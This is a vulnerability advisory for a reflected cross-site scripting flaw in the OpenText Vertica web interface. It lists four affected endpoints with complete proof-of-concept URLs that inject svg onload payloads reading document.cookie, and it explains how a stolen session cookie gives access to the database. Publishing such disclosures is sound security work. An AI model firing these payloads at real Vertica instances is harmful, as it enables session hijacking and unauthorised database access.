CVE-2025-12454 - OpenText Vertica 

Vulnerability Description: Reflected Cross Site Scripting - CWE-79

Software Version: 10.x, 11.x, 12.x, 23.x, 24.x, 25.1.x

NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-12454

CVSS: 

Severity: 

Credits: Marco Nappi, Mariano Forte, Federico Draghelli, Massimiliano Brolli

Cross-Site Scripting Reflected, an attacker can run arbitrary JavaScript code exploiting unmanaged input. 

Step-by-step instructions and PoC

1.  Log in to the web application  
2. Visit the provided URL 

Affected Endpoints

• URL: https://<ip>:<port>/webui/databases/1/explain?startTime=<svg/onload=alert(document.cookie)>
• HTTP Parameter: startTime, endTime

• URL: https://<ip>:<port>/webui/clusters?clusterId=1“><svg/onload=alert(document.cookie)>
• HTTP Parameter: clusterId

• URL: https://<ip>:<port>/webui/troubleshooting/mclog?startTime=19+Jun+2025+08%3A54%3A58.974%3

             Esss&endTime=19+Jun+2025+09%3A54%3A58.974%22%3Esss&pageNum=1%27%3E%3Csvg/onload=alert

             (document.cookie)%3E

• HTTP Parameter: PageNum

• URL: https://<ip>:<port>/webui/troubleshooting/auditlog/records?1750321425872&maxEntries=500%27<

             svg%2fonload=alert(document.cookie)>&startTime=1750307021463&endTime=1750321421473

• HTTP Parameter: maxEntries

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability (second example): “><svg/onload=alert(document.cookie)>

Security Impact

Due to this Reflected Cross-Site Scripting (XSS) vulnerability an attacker can gain the full access to the Databases managed through the web application. Exploiting this vulnerability an attacker can steal the session cookie of any user. Using the stolen cookie an attacker can log into the web application without the user’s password. Once logged the user can use the web application to interact with the database.

Back